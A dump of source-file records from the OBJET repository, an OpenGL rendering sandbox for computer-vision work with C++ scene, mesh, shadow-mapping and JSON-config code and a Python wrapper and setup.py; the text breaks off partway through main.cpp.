"alphanum_fraction": 0.6804261207580566, "avg_line_length": 18.256410598754883, "blob_id": "e5b962be0fe0677a21260b53efc3ba7f4da5a82f", "content_id": "a32375275e56fc537f0b7aefeadedbb86a39b946", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 751, "license_type": "permissive", "max_line_length": 66, "num_lines": 39, "path": "/inc/object.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <string>\n#include <fstream>\n#include <sstream>\n#include <vector>\n\n#include <GL/glew.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n#include <assimp/Importer.hpp>\n#include <assimp/scene.h>\n#include <assimp/postprocess.h>\n\n#include \"data.h\"\n#include \"mesh.h\"\n#include \"shader.h\"\n\nclass Object\n{\npublic:\n /* Data */\n const std::string name;\n std::vector<Mesh> meshes;\n data::ObjectData* objectData;\n\n /* Functions */\n Object(const char* pathToObjectJSON, const std::string &name);\n\n void draw(Shader* shader) const;\n\nprivate:\n /* Functions */\n void processNode(aiNode *node, const aiScene *scene);\n\n Mesh processMesh(aiMesh *mesh, const aiScene *scene);\n};\n" }, { "alpha_fraction": 0.6385669112205505, "alphanum_fraction": 0.6417281627655029, "avg_line_length": 26.114286422729492, "blob_id": "c0b03fe68faac30cafe2770740afd39e3a8715d1", "content_id": "387f2a79e89312bb91b4005a39015c961cf422cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "permissive", "max_line_length": 61, "num_lines": 35, "path": "/setup.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "import subprocess\n\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\nversion = '1.0'\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nclass ObjetBuild(build_ext):\n def run(self, ):\n subprocess.check_call(['make', 'python'])\n build_ext.run(self)\n\nsetup(\n name='pyobjet',\n version=version,\n author='Mahan Fathi',\n author_email='[email protected]',\n description=\"OBJET: A Computer Vision Graphical Sandbox\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/MahanFathi/OBJET\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n ],\n install_requires=['numpy'],\n packages=['pyobjet'],\n package_data={'': [\"_OBJET.so\"]},\n cmdclass=dict(build_ext=ObjetBuild),\n zip_safe=False,\n)\n" }, { "alpha_fraction": 0.6841848492622375, "alphanum_fraction": 0.6998047232627869, "avg_line_length": 30.352041244506836, "blob_id": "73b1a3b29a176cb81aac6d7d6d4d3044a63aea61", "content_id": "fb060c3cb1520f78d71847f265dbab6c3f030012", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6146, "license_type": "permissive", "max_line_length": 126, "num_lines": 196, "path": "/OBJET.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"OBJET.h\"\n\n#include <FreeImage.h>\n\n#include \"glsls.h\"\n#include \"util.h\"\n\nOBJET::OBJET(std::string pathToMetaJSON, int width, int height):\n width(width), height(height), shadowWidth(3 * width), shadowHeight(3 * height)\n{\n InitOpenGL();\n InitShaders();\n model = new Model(pathToMetaJSON.c_str());\n}\n\n\nvoid OBJET::Draw()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n\n shadowShader->use();\n model->setShadow(shadowShader);\n glViewport(0, 0, shadowWidth, shadowHeight);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFramebuffer);\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n model->draw(shadowShader);\n\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n glViewport(0, 0, width, height);\n glClearColor(0.55f, 0.77, 0.85f, 1.0f);\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n\n objectShader->use();\n model->setEnvironment(objectShader);\n objectShader->setUniform(\"shadowMap\", 0);\n\n glActiveTexture(GL_TEXTURE0);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n\n model->draw(objectShader);\n\n glFlush();\n}\n\n\nstd::vector<float> OBJET::GetDepthMap()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // Make the FLOAT array\n GLfloat* pixels = new GLfloat[width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT, pixels);\n\n std::vector<float> image;\n float near = model->metaData->cameraPerspectiveNearPlane;\n float far = model->metaData->cameraPerspectiveFarPlane;\n for (int i = 0; i < width * height; i++) {\n float z = 2.0f * pixels[i] - 1.0f;\n z = (2.0 * near * far) / (far + near - z * (far - near));\n image.push_back(z);\n }\n\n return image;\n}\n\n\nstd::vector<int> OBJET::GetImage()\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // Make the BYTE array\n GLubyte* pixels = new GLubyte[3 * width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_RGB, GL_UNSIGNED_BYTE, pixels);\n\n std::vector<int> image;\n for (int i = 0; i < 3 * width * height; i++)\n image.push_back(static_cast<int>(pixels[i]));\n\n return image;\n}\n\n\nvoid OBJET::ToImage(std::string pathToImage)\n{\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n\n // Make the BYTE array\n GLubyte* pixels = new GLubyte[3 * width * height];\n\n glPixelStorei(GL_PACK_ALIGNMENT, 1);\n glReadPixels(0, 0, width, height, GL_BGR_EXT, GL_UNSIGNED_BYTE, pixels);\n\n FIBITMAP* image = FreeImage_ConvertFromRawBits(pixels, width, height, 3 * width, 24, 0x0000FF, 0xFF0000, 0x00FF00, false);\n FreeImage_Save(FIF_PNG, image, pathToImage.c_str(), 0);\n FreeImage_Unload(image);\n delete [] pixels;\n}\n\n\nvoid OBJET::SetCamera(std::vector<float> position, std::vector<float> target)\n{\n model->setCamera(position, target);\n}\n\n\nvoid OBJET::SetObjectPosition(std::string objectName, std::vector<float> position)\n{\n model->setObjectPosition(objectName, position);\n}\n\n\nvoid OBJET::SetObjectYRotation(std::string objectName, float yRotation)\n{\n model->setObjectYRotation(objectName, yRotation);\n}\n\n\nvoid OBJET::SetObjectScale(std::string objectName, float scale)\n{\n model->setObjectScale(objectName, scale);\n}\n\n\nvoid OBJET::InitOpenGL()\n{\n // init GLFW\n glfwInit();\n glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3);\n glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3);\n glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\n // create a window\n window = glfwCreateWindow(width, height, \"OBJET\", NULL, NULL);\n glfwMakeContextCurrent(window);\n glfwHideWindow(window);\n\n GLenum err = glewInit();\n if (err != GLEW_OK)\n exit(1);\n\n // hide and caputure the cursor\n glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED);\n\n // rendering window size\n glViewport(0, 0, width, height);\n\n // assign callback functions\n glfwSetFramebufferSizeCallback(window, framebuffer_size_callback);\n\n // run depth check (Z-buffer)\n glEnable(GL_DEPTH_TEST);\n\n /* Reder FrameBuffer */ // off-screen rendering\n // weird stuff happens in i3 for example when rendering to\n // the main buffer, the desktop manager messes with window\n glGenFramebuffers(1, &renderFramebuffer);\n glBindFramebuffer(GL_FRAMEBUFFER, renderFramebuffer);\n // color attachment texture\n unsigned int textureColorbuffer;\n glGenTextures(1, &textureColorbuffer);\n glBindTexture(GL_TEXTURE_2D, textureColorbuffer);\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGB, GL_UNSIGNED_BYTE, NULL);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR);\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, textureColorbuffer, 0);\n // renderbuffer object\n unsigned int rbo;\n glGenRenderbuffers(1, &rbo);\n glBindRenderbuffer(GL_RENDERBUFFER, rbo);\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH24_STENCIL8, width, height);\n glFramebufferRenderbuffer(GL_FRAMEBUFFER, GL_DEPTH_STENCIL_ATTACHMENT, GL_RENDERBUFFER, rbo);\n\n /* Depth Map FrameBuffer */ // for shadowing\n glGenFramebuffers(1, &depthMapFramebuffer);\n glGenTextures(1, &depthMap);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, shadowWidth, shadowHeight,\n 0, GL_DEPTH_COMPONENT, GL_FLOAT, NULL);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFramebuffer);\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, depthMap, 0);\n glDrawBuffer(GL_NONE); glReadBuffer(GL_NONE);\n\n}\n\n\nvoid OBJET::InitShaders()\n{\n objectShader = new Shader(objectVertexShader, objectFragmentShader);\n shadowShader = new Shader(shadowVertexShader, shadowFragmentShader);\n}\n\n" }, { "alpha_fraction": 0.6232127547264099, "alphanum_fraction": 0.6307821869850159, "avg_line_length": 28.725000381469727, "blob_id": "206be7db509a54f41b5a337a36008834235598b8", "content_id": "87ac45215be36e7193a736c3acd7ac26e8d704b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "permissive", "max_line_length": 65, "num_lines": 40, "path": "/pyobjet/objet.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "from .OBJET import OBJET\n\nimport numpy as np\n\nclass Objet(object):\n \"\"\"OBJET\"\"\"\n\n def __init__(self, path_to_meta_json, width=500, height=500):\n self._OBJET = OBJET(path_to_meta_json, width, height)\n\n self.width = width\n self.height = height\n\n def draw(self, ):\n self._OBJET.Draw()\n\n def get_image(self, ):\n img = np.array(self._OBJET.GetImage())\n img = img.reshape([self.height, self.width, -1])\n return np.flip(img, axis=0)\n\n def get_depth_map(self, ):\n img = np.array(self._OBJET.GetDepthMap())\n img = img.reshape([self.height, self.width])\n return np.flip(img, axis=0)\n\n def to_image(self, path_to_image):\n self._OBJET.ToImage(path_to_image)\n\n def set_camera(self, position, target):\n self._OBJET.SetCamera(position, target)\n\n def set_object_position(self, object_name, position):\n self._OBJET.SetObjectPosition(object_name, position)\n\n def set_object_y_rotation(self, object_name, y_rotation):\n self._OBJET.SetObjectYRotation(object_name, y_rotation)\n\n def set_object_scale(self, object_name, scale):\n self._OBJET.SetObjectScale(object_name, scale)\n" }, { "alpha_fraction": 0.6228868365287781, "alphanum_fraction": 0.6254876255989075, "avg_line_length": 15.361701965332031, "blob_id": "a1570b5b68956cae5bc56eaff5df13ef6a0dfb62", "content_id": "aa807243188b5ee20f6d8cc32791db987b6721f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 769, "license_type": "permissive", "max_line_length": 88, "num_lines": 47, "path": "/inc/mesh.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <string>\n#include <fstream>\n#include <sstream>\n#include <vector>\n\n#include <GL/glew.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n\n#include \"shader.h\"\n\nstruct Vertex {\n glm::vec3 Position;\n glm::vec3 Normal;\n};\n\nstruct Texture {\n unsigned int id;\n std::string type;\n std::string path;\n};\n\n\nclass Mesh {\npublic:\n /* Mesh Data */\n std::vector<Vertex> vertices;\n std::vector<unsigned int> indices;\n GLuint VAO;\n\n /* Functions */\n Mesh(const std::vector<Vertex> &vertices, const std::vector<unsigned int> &indices);\n ~Mesh();\n void draw(Shader* shader) const;\n\n\nprivate:\n /* Render data */\n GLuint VBO, EBO;\n\n /* Functions */\n void setupMesh();\n};\n" }, { "alpha_fraction": 0.5755102038383484, "alphanum_fraction": 0.6530612111091614, "avg_line_length": 26.22222137451172, "blob_id": "9ee984fd4fda0de815d2a706e2160f7083eea72b", "content_id": "942dce20223e8f099a2d365fe099640f3fbcb428", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 245, "license_type": "permissive", "max_line_length": 53, "num_lines": 9, "path": "/src/common.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <glm/glm.hpp>\n#include \"common.h\"\n\n\n// cam settings\nfloat deltaTime = 0.0f;\nglm::vec3 cameraPos = glm::vec3(7.0f, 4.0f, 7.0f);\nglm::vec3 cameraFront = glm::normalize(-cameraPos);\nglm::vec3 cameraUp = glm::vec3(0.0f, 1.0f, 0.0f);\n" }, { "alpha_fraction": 0.7668161392211914, "alphanum_fraction": 0.7713004350662231, "avg_line_length": 21.299999237060547, "blob_id": "2d24052682ee7d9e09e5d8bb32f9de5fc724a44a", "content_id": "66d091b6e9981e7e77944974f7c2060eb6bd90d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 223, "license_type": "permissive", "max_line_length": 74, "num_lines": 10, "path": "/inc/util.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <GLFW/glfw3.h>\n\n\nvoid framebuffer_size_callback(GLFWwindow* window, int width, int height);\n\nvoid processInput(GLFWwindow *window);\n\nvoid mouse_callback(GLFWwindow* window, double xpos, double ypos);\n" }, { "alpha_fraction": 0.6376944184303284, "alphanum_fraction": 0.6557639241218567, "avg_line_length": 30.22857093811035, "blob_id": "2d847fd8ceeac288027d6653f8bed55e54d59edf", "content_id": "8194de1d35a060ff551f55806872e0e34b2fe9df", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4372, "license_type": "permissive", "max_line_length": 112, "num_lines": 140, "path": "/src/model.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"model.h\"\n\nModel::Model(const char* pathToMetaJSON)\n{\n metaData = new data::MetaData(pathToMetaJSON);\n for (unsigned int i = 0; i < metaData->objectCount; i++) {\n std::string pathToObjectJSON = metaData->objectJSONPaths[i];\n std::string objectName = metaData->objectNames[i];\n objects.push_back(Object(pathToObjectJSON.c_str(), objectName));\n }\n}\n\n\nvoid Model::setEnvironment(Shader* shader)\n{\n setShadow(shader);\n setCamera(shader);\n setLightProperties(shader);\n}\n\n\nvoid Model::draw(Shader* shader)\n{\n for(unsigned int i = 0; i < objects.size(); i++) {\n setTransformations(shader, i);\n objects[i].draw(shader);\n }\n}\n\n\nvoid Model::setLightProperties(Shader* shader)\n{\n // directional lighting\n shader->setUniform(\"directionalLight.direction\", glm::normalize(metaData->directionalLightDirection));\n shader->setUniform(\"directionalLight.color\", metaData->directionalLightColor);\n\n // point lighting\n shader->setUniform(\"pointLightCount\", metaData->pointLightCount);\n for(unsigned int i = 0; i < metaData->pointLightCount; i++) {\n shader->setUniform(\"pointLights[\" + std::to_string(i) + \"].position\", metaData->pointLightPositions[i]);\n shader->setUniform(\"pointLights[\" + std::to_string(i) + \"].color\", metaData->pointLightColors[i]);\n }\n}\n\n\nvoid Model::setTransformations(Shader* shader, const unsigned int &objectNum)\n{\n // scale and rotate\n glm::mat4 rotation = glm::mat4(1.0f);\n rotation = glm::rotate(rotation, metaData->objectYRotations[objectNum], glm::vec3(0.0f, 1.0f, 0.0f));\n rotation = glm::scale(rotation, metaData->objectScales[objectNum] * glm::vec3(1.0f, 1.0f, 1.0f));\n shader->setUniform(\"transform\", rotation);\n\n // translate\n glm::mat4 translate = glm::mat4(1.0f);\n translate = glm::translate(translate, metaData->objectTranslations[objectNum]);\n shader->setUniform(\"model\", translate);\n\n}\n\n\nvoid Model::setCamera(Shader* shader)\n{\n glm::vec3 cameraUp = glm::vec3(0.0f, 1.0f, 0.0);\n glm::mat4 view = glm::lookAt(\n metaData->cameraPosition,\n -metaData->cameraPosition + metaData->cameraTarget,\n cameraUp);\n shader->setUniform(\"view\", view);\n\n glm::mat4 projection = glm::mat4(1.0f);\n projection = glm::perspective(glm::radians(metaData->cameraFieldOfView), 1.0f, // FIXME: aspect ratio\n metaData->cameraPerspectiveNearPlane,\n metaData->cameraPerspectiveFarPlane);\n shader->setUniform(\"projection\", projection);\n}\n\n\nvoid Model::setShadow(Shader* shader)\n{\n float scale = 10;\n float bound = 30.0f, near_plane = 5.0f, far_plane = 20.0f;\n glm::mat4 lightProjection = glm::ortho(-bound, bound, -bound, bound, near_plane, far_plane);\n glm::mat4 lightView = glm::lookAt(-scale * glm::normalize(metaData->directionalLightDirection),\n glm::vec3( 0.0f, 0.0f, 0.0f), glm::vec3( 0.0f, 1.0f, 0.0f));\n glm::mat4 lightSpaceMatrix = lightProjection * lightView;\n shader->setUniform(\"lightSpaceMatrix\", lightSpaceMatrix);\n}\n\n\nunsigned Model::objectNameToIndex(const std::string &objectName) const\n{\n std::ptrdiff_t pos = distance(\n metaData->objectNames.begin(),\n find(metaData->objectNames.begin(),\n metaData->objectNames.end(),\n objectName)\n );\n return unsigned(pos);\n}\n\n\nvoid Model::setCamera(const std::vector<float> &position, const std::vector<float> &target)\n{\n metaData->cameraPosition = glm::vec3(\n position[0],\n position[1],\n position[2]\n );\n metaData->cameraTarget = glm::vec3(\n target[0],\n target[1],\n target[2]\n );\n}\n\n\nvoid Model::setObjectPosition(const std::string &objectName, const std::vector<float> &position)\n{\n unsigned index = objectNameToIndex(objectName);\n metaData->objectTranslations[index] = glm::vec3(\n position[0],\n position[1],\n position[2]\n );\n}\n\n\nvoid Model::setObjectYRotation(const std::string &objectName, const float &yRotation)\n{\n unsigned index = objectNameToIndex(objectName);\n metaData->objectYRotations[index] = yRotation;\n}\n\n\nvoid Model::setObjectScale(const std::string &objectName, const float &scale)\n{\n unsigned index = objectNameToIndex(objectName);\n metaData->objectScales[index] = scale;\n}\n" }, { "alpha_fraction": 0.7081748843193054, "alphanum_fraction": 0.7081748843193054, "avg_line_length": 29.941177368164062, "blob_id": "967876a0e5614af7362243fbc3acdca6dcd07436", "content_id": "bd6f59c579e9787c617ba98a7c63177f5f52485d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 96, "num_lines": 34, "path": "/inc/model.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <vector>\n\n#include \"data.h\"\n#include \"object.h\"\n#include \"shader.h\"\n\n\nclass Model\n{\npublic:\n /* Data */\n data::MetaData* metaData;\n std::vector<Object> objects; // model contains a bunch of objects, e.g. the room, or objects\n\n /* Functions */\n Model(const char *pathToObjectJSON);\n void setShadow(Shader* shader);\n void setEnvironment(Shader* shader);\n void draw(Shader* shader);\n void setCamera(const std::vector<float> &position, const std::vector<float> &target);\n void setObjectPosition(const std::string &objectName, const std::vector<float> &position);\n void setObjectYRotation(const std::string &objectName, const float &yRotation);\n void setObjectScale(const std::string &objectName, const float &scale);\n\nprivate:\n /* Functions */\n void setTransformations(Shader* shader, const unsigned int &objectNum);\n void setLightProperties(Shader* shader);\n void setCamera(Shader* shader);\n unsigned objectNameToIndex(const std::string &objectName) const;\n};\n" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6086956262588501, "avg_line_length": 14.333333015441895, "blob_id": "cb8d0eef37e63bb0d419ff4c9e123b6db0a5d9c8", "content_id": "80acb0ba6275bce65f5bca9bac2dc72de42ab599", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/pyobjet/__init__.py", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "from .objet import Objet\n\n__all__ = [\"Objet\"]\n" }, { "alpha_fraction": 0.6869118809700012, "alphanum_fraction": 0.6937553286552429, "avg_line_length": 19.875, "blob_id": "a417555d344078c7baeb3d7b3271750ec04515ce", "content_id": "a4b8eb60cc5f03cf758803ea6abba46fe13bb271", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 53, "num_lines": 56, "path": "/inc/data.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <vector>\n#include <rapidjson/document.h>\n#include <glm/glm.hpp>\n\n\nrapidjson::Document readJSON(const char *pathToJSON);\n\nnamespace data {\n\nclass MetaData\n{\npublic:\n /* Data */\n // objects\n int objectCount;\n std::vector<std::string> objectNames;\n std::vector<std::string> objectJSONPaths;\n std::vector<glm::vec3> objectTranslations;\n std::vector<float> objectYRotations;\n std::vector<float> objectScales;\n // camera\n glm::vec3 cameraPosition;\n glm::vec3 cameraTarget;\n float cameraFieldOfView;\n float cameraPerspectiveNearPlane;\n float cameraPerspectiveFarPlane;\n // lighting\n int pointLightCount;\n std::vector<glm::vec3> pointLightPositions;\n std::vector<glm::vec3> pointLightColors;\n glm::vec3 directionalLightDirection;\n glm::vec3 directionalLightColor;\n\n /* Functions */\n MetaData(const char *pathToModelJSON);\n\n};\n\nclass ObjectData\n{\npublic:\n /* Data */\n std::string objPath;\n glm::vec3 color;\n float ambientStrength;\n float diffuseStrength;\n float specularStrength;\n\n /* Functions */\n ObjectData(const char *pathToObjectJSON);\n};\n\n}\n" }, { "alpha_fraction": 0.626556932926178, "alphanum_fraction": 0.6367882490158081, "avg_line_length": 39.87272644042969, "blob_id": "0fa5d6ed5862b991f232d7693b0b052c1bf6c1ee", "content_id": "d98e5f1ae6a6456c742bb6381cf9d8dea26137f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4496, "license_type": "permissive", "max_line_length": 99, "num_lines": 110, "path": "/src/data.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n\n#include \"data.h\"\n\n\ndata::MetaData::MetaData(const char *pathToMetaJSON) {\n rapidjson::Document metaJSON = readJSON(pathToMetaJSON);\n\n rapidjson::Value& objects = metaJSON[\"objects\"];\n objectCount = objects.Size();\n\n /* parse the data into object */\n for (rapidjson::SizeType i = 0; i < objectCount; i++) {\n // get strings\n objectNames.push_back(objects[i][\"name\"].GetString());\n objectJSONPaths.push_back(objects[i][\"path_to_json\"].GetString());\n //get scales, rotations, and translations\n float objectScale = objects[i][\"scale\"].GetFloat();\n objectScales.push_back(objectScale);\n float objectYRotation = objects[i][\"rotation_y\"].GetFloat();\n objectYRotations.push_back(objectYRotation);\n float translation_x = objects[i][\"translation\"][\"x\"].GetFloat();\n float translation_y = objects[i][\"translation\"][\"y\"].GetFloat();\n float translation_z = objects[i][\"translation\"][\"z\"].GetFloat();\n objectTranslations.push_back(\n glm::vec3(translation_x, translation_y, translation_z)\n );\n }\n\n rapidjson::Value& pointLights = metaJSON[\"lighting\"][\"point_lights\"];\n pointLightCount = pointLights.Size();\n\n /* parse the data into pointLights */\n for (rapidjson::SizeType i = 0; i < pointLightCount; i++) {\n // get position\n float position_x = pointLights[i][\"position\"][\"x\"].GetFloat();\n float position_y = pointLights[i][\"position\"][\"y\"].GetFloat();\n float position_z = pointLights[i][\"position\"][\"z\"].GetFloat();\n pointLightPositions.push_back(\n glm::vec3(position_x, position_y, position_z)\n );\n // get color\n float color_r = float(pointLights[i][\"color\"][\"r\"].GetInt()) / 255.0f;\n float color_g = float(pointLights[i][\"color\"][\"g\"].GetInt()) / 255.0f;\n float color_b = float(pointLights[i][\"color\"][\"b\"].GetInt()) / 255.0f;\n pointLightColors.push_back(\n glm::vec3(color_r, color_g, color_b)\n );\n }\n\n /* parse the data into directionalLigth */\n rapidjson::Value& directionalLight = metaJSON[\"lighting\"][\"directional_light\"];\n float direction_x = directionalLight[\"direction\"][\"x\"].GetFloat();\n float direction_y = directionalLight[\"direction\"][\"y\"].GetFloat();\n float direction_z = directionalLight[\"direction\"][\"z\"].GetFloat();\n directionalLightDirection = glm::vec3(\n direction_x, direction_y, direction_z\n );\n float color_r = float(directionalLight[\"color\"][\"r\"].GetInt()) / 255.0f;\n float color_g = float(directionalLight[\"color\"][\"g\"].GetInt()) / 255.0f;\n float color_b = float(directionalLight[\"color\"][\"b\"].GetInt()) / 255.0f;\n directionalLightColor = glm::vec3(\n color_r, color_g, color_b\n );\n\n /* parse the data into camera */\n rapidjson::Value& camera = metaJSON[\"camera\"];\n float position_x = camera[\"position\"][\"x\"].GetFloat();\n float position_y = camera[\"position\"][\"y\"].GetFloat();\n float position_z = camera[\"position\"][\"z\"].GetFloat();\n cameraPosition = glm::vec3(\n position_x, position_y, position_z\n );\n float target_x = camera[\"target\"][\"x\"].GetFloat();\n float target_y = camera[\"target\"][\"y\"].GetFloat();\n float target_z = camera[\"target\"][\"z\"].GetFloat();\n cameraTarget = glm::vec3(\n target_x, target_y, target_z\n );\n cameraFieldOfView = camera[\"perspective\"][\"field_of_view\"].GetFloat();\n cameraPerspectiveNearPlane = camera[\"perspective\"][\"near_plane\"].GetFloat();\n cameraPerspectiveFarPlane = camera[\"perspective\"][\"far_plane\"].GetFloat();\n}\n\n\ndata::ObjectData::ObjectData(const char *pathToObjectJSON) {\n rapidjson::Document objJSON = readJSON(pathToObjectJSON);\n\n objPath = objJSON[\"path_to_obj\"].GetString();\n color = glm::vec3(\n float(objJSON[\"color\"][\"r\"].GetInt()) / 255.0f,\n float(objJSON[\"color\"][\"g\"].GetInt()) / 255.0f,\n float(objJSON[\"color\"][\"b\"].GetInt()) / 255.0f\n );\n ambientStrength = objJSON[\"ambient_strength\"].GetFloat();\n diffuseStrength = objJSON[\"diffuse_strength\"].GetFloat();\n specularStrength = objJSON[\"specular_strength\"].GetFloat();\n}\n\n\nrapidjson::Document readJSON(const char *pathToJSON) {\n std::ifstream jsonFile(pathToJSON);\n std::string json((std::istreambuf_iterator<char>(jsonFile)), std::istreambuf_iterator<char>());\n\n rapidjson::Document jsonDoc;\n jsonDoc.Parse(json.c_str());\n\n return jsonDoc;\n}\n" }, { "alpha_fraction": 0.640595018863678, "alphanum_fraction": 0.6607485413551331, "avg_line_length": 29.202898025512695, "blob_id": "28c8a9af89b70c2ff610ef0cad3e62f946d62fa1", "content_id": "8f28f3cd0926940f251d4d09d31c60076a6d50ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4168, "license_type": "permissive", "max_line_length": 92, "num_lines": 138, "path": "/main.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <math.h>\n\n#include <GL/glew.h>\n#include <GLFW/glfw3.h>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/matrix_transform.hpp>\n#include <glm/gtc/type_ptr.hpp>\n\n#include <string>\n#include <fstream>\n#include <streambuf>\n\n#include \"model.h\"\n#include \"shader.h\"\n#include \"util.h\"\n#include \"common.h\"\n#include \"glsls.h\"\n\n\nint main()\n{\n // init GLFW\n glfwInit();\n glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3);\n glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3);\n glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\n const unsigned int width = 500, height = 500;\n\n // create a window\n GLFWwindow* window = glfwCreateWindow(width, height, \"OBJET\", NULL, NULL);\n if (window == NULL)\n {\n std::cout << \"Failed to create GLFW window\" << std::endl;\n glfwTerminate();\n return -1;\n }\n glfwMakeContextCurrent(window);\n\n GLenum err = glewInit();\n if (err != GLEW_OK)\n exit(1);\n\n // hide and caputure the cursor\n glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED);\n\n // rendering window size\n glViewport(0, 0, width, height);\n\n // assign callback functions\n glfwSetFramebufferSizeCallback(window, framebuffer_size_callback);\n glfwSetCursorPosCallback(window, mouse_callback);\n\n // shader\n Shader* objectShader = new Shader(objectVertexShader, objectFragmentShader);\n\n // model\n Model model(\"./configs/ps_meta.json\");\n\n // make transformations\n // projection\n glm::mat4 view = glm::mat4(1.0f);\n glm::mat4 projection = glm::mat4(1.0f);\n projection = glm::perspective(glm::radians(60.0f), 500.0f / 500.0f, 0.1f, 1000.0f);\n\n // run depth check (Z-buffer)\n glEnable(GL_DEPTH_TEST);\n\n // shadowing\n unsigned int depthMapFBO;\n glGenFramebuffers(1, &depthMapFBO);\n const unsigned int shadowWidth = 1024, shadowHeight = 1024;\n unsigned int depthMap;\n glGenTextures(1, &depthMap);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT,\n shadowWidth, shadowHeight, 0, 